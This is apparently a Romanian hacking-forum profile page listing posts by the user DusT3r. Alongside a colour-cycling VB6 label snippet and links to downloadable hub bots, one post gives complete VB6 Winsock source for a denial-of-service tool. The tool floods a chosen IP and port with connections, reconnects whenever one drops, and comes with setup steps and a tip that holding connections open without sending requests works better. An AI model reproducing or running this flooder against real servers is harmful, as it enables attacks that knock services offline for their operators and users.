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Everything posted by DusT3r

  1. e cel mai bun avastu
  2. port scanneru asta mai e pus odata !! DELETE !
  3. nu merge linku cu skins
  4. 1. un timer 2. Cate labele vreti si le treceti in Codu la timer Timer Code: Static Col1, Col2, Col3 As Integer Static C1, C2, C3 As Integer If (Col1 = 0 Or Col1 = 250) And (Col2 = 0 Or Col2 = 250) And (Col3 = 0 Or Col3 = 250) Then C1 = Int(Rnd * 3) C2 = Int(Rnd * 3) C3 = Int(Rnd * 3) End If If C1 = 1 And Col1 <> 0 Then Col1 = Col1 - 10 If C2 = 1 And Col2 <> 0 Then Col2 = Col2 - 10 If C3 = 1 And Col3 <> 0 Then Col3 = Col3 - 10 If C1 = 2 And Col1 <> 250 Then Col1 = Col1 + 10 If C2 = 2 And Col2 <> 250 Then Col2 = Col2 + 10 If C3 = 2 And Col3 <> 250 Then Col3 = Col3 + 10 Label1.ForeColor = RGB(Col1, Col2, Col3) --------------------------------------------------------------------------------
  5. DusT3r

    DDos cu port

    5 TextBos primu cu nume TxtIp ptr IP al doilea TxtPort pentru port al treilea TxTConnections al patrulea TxtLive ptr activi al 5 lea cu nume TxtLog pentru Detaliile ddosurlui - 2 Command Button primu ptr Start cu nume de Cmd Start si al doilea ptr Exit cu Command1 - si un timer cu nume Timer1 si interval 500 si punetzi codu asta 'I DO NOT RECOMEND THAT YOU USE THIS PROGRAM EXCEPT ON SERVERS WHERE YOU HAVE PERMISSION TO USE IT 'USING DoS PROGRAMS IS CONSIDERED LAME, I ONLY WROTE THIS AS AN EXAMPLE ON HOW VUNRABLE MANY SERVERS ARE. Private Sub CmdStart_Click() For intI = 1 To Val(Me.TxtConnections) Load Me.Winsock1(intI) Me.Winsock1(intI).Connect Me.TxtIP, TxtPort.Text Next intI End Sub Private Sub Command1_Click() End End Sub Private Sub Timer1_Timer() TxtLive.Text = Winsock1.Count - 1 End Sub Private Sub Winsock1_Close(Index As Integer) Txtlog.Text = Txtlog.Text & vbNewLine & "Winsock Lost" Winsock1(Index).Close Winsock1(Index).Connect TxtIP.Text, TxtPort.Text TxtLive.Text = TxtLive.Text - 1 End Sub Private Sub Winsock1_Connect(Index As Integer) Dim data1 As String TxtLive.Text = Winsock1.Count data1 = "GET / HTTP/1.0" & vbNewLine & vbNewLine 'works better if you don't actualy request, but just hog the server with connections 'Winsock1(Index).SendData data1 'Timer1.Enabled = True End Sub Private Sub Winsock1_DataArrival(Index As Integer, ByVal bytesTotal As Long) Dim Recived As String Winsock1(Index).GetData Recived Txtlog.Text = Txtlog.Text & Recived End Sub
  6. Cand Intra useru pe hub il autoinregistreaza cu profilu REG
  7. http://rapidshare.com/files/37720160/NevAutoReg_Bot_by_Nev___Doghy.exe.html mega Bot by Nev & Doghy
  8. Un Security Hub Bot facut de mine http://rapidshare.com/files/37543756/EtherNoS-SecuRiTy-BoT-v.1.rar.html
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